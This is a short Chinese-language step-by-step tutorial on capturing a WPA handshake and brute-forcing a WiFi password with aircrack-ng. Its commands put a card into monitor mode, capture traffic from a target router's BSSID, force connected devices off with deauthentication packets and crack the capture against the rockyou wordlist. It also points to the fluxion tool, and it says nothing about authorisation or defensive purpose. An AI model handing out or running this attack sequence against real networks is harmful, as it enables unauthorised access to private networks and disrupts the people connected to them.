抓取握手包，暴力破解

1.连接外置网卡，把网卡设为监听模式。

监听之前先把network-manager服务禁用:

service network-manager stop


2.关闭有可能影响aircrack使用的进程关闭：

airmon-ng check kill


3.

airmon-ng start wlan0

（把网卡变为监听模式，输入ifconfig可看到wlan0已变成wlan0mon）

4.

airodump-ng wlan0mon

（扫描附近的wifi，按Ctrl+C停止扫描）。

5.抓取握手包：


airodump-ng -c 1 \--bssid DC:FE:18:53:81:C9 -w hack wlan0mon


（ -c 指定信道，-bssid指定目标路由器的BBSID，-w指定抓取的数据包保存的目录，默认在根目录中。）

6.打开一个新的终端，强制连接到wifi的设备重连路由器，以便快速抓包。

aireplay-ng -0 2 -a 连接设备的BSSID值 -c 连接设备的STATION值 wlan0mon：（-a指定wifi热点的BSSID，-c指定要攻击设备的STATION地址,wlan0mon是网卡的名字，注意有时是mon0）

7. 破解密码代码：

aircrack-ng -a2 -b BSSID值 -w /usr/share/wordlist/rockyou.txt \~/\*.cap


注：抓包也可以借助fluxion软件

进入fluxion软件，

运行fluxion.sh

，命令： ./fluxion.sh